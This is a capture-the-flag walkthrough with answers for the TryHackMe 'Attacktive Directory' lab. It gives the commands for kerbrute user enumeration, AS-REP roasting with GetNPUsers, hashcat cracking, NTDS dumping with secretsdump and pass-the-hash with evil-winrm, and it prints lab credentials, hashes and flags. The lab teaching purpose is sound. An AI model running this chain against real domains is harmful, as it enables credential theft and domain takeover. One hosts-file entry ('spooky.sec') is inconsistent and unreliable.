Attacktive Directory

What tool will allow us to enumerate port 139/445?

Answer: enum4linux

What is the NetBIOS-Domain Name of the machine?

Answer: THM-AD
Context: If you use the following nmap command nmap -A -v -p139,445 10.10.79.210 you will get the results. You can also use enum4linux <ip>

What invalid TLD do people commonly use for their Active Directory Domain?

Answer: .local

What command within Kerbrute will allow us to enumerate valid usernames?

Answer: userenum
Context: First install kerbrute by downloading the kerbrute_linux_amd64 file from the GH repo here. Run the command ./kerbrute_linux_amd64 -h

What notable account is discovered? (These should jump out at you)

Answer: svc-admin
Context: This one requires some setup since kerbrute expects a domain name and not an IP address. we know from task 3 that the domain is spookysec.local. So you will need to edit the hosts file (/etc/hosts) and add the line <ip> spooky.sec once that is complete you should be able to run the following command: ./kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt

What notable account is discovered? (These should jump out at you)

Answer: svc-admin

What is the other notable account is discovered? (These should jump out at you)

answer: backup


Abusing Kerberos

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

Answer: svc-admin
Context: You will fist need to create a new txt file which includes the 2 notable accounts svc-admin and backup. Run the script using the command python3 /opt/impacket/examples/GetNPUsers.py this will give you the parameters you required for the command which should result in looking something like the following (replace the txt file and ip with the correct ones):

python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile youtxtfile.txt -dc-ip 10.10.xx.xx spookysec.local/

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Answer: Kerberos 5, etype 23, AS-REP
Context: From the results from the previous question, look at the first part of the result and compare in the wiki here.

What mode is the hash?

Answer: 18200
Context: Use the information from the previous question in the Wiki, the hash-mode is provided

Now crack the hash with the modified password list provided, what is the user accounts password?

Answer: management2005
Context: Store the hash in txt file and run the command hashcat -m18200 hash.txt passwordlist.txt the answer will be found at the end of the hash in the results.


Domain Privilege Escalation

What method allowed us to dump NTDS.DIT?

Answer: DRSUAPI
Context: Once you run the file (secretsdump.py) using the command python3 secretsdump.py -dc-ip spookysec.local backup:backup251786@spookysec.local look at the results and you will see the method used.

What is the Administrators NTLM hash?

Answer: 0e0363213e37b94221497260b0bcb4fc
Context: Take look at the out again.

What method of attack could allow us to authenticate as the user without the password?

Answer: pass the hash
Context: google it 🙂

Using a tool called Evil-WinRM what option will allow us to use a hash?

Answer: -h
Context: Google as well and the readme file in their GH repo has a list of all the options.


Flag Submission

For this one, make sure you have Evil-WinRM installed and proceed to login using the Administrator username and hash from the previous questions. Your command for should look like evil-winrm -i [Target_IP] -u Administrator -H [Administrator_Hash]

svc-admin

Answer: TryHackMe{K3rb3r0s_Pr3_4uth}

backup

Answer: TryHackMe{B4ckM3UpSc0tty!}

Administrator

Answer: TryHackMe{4ctiveD1rectoryM4st3r}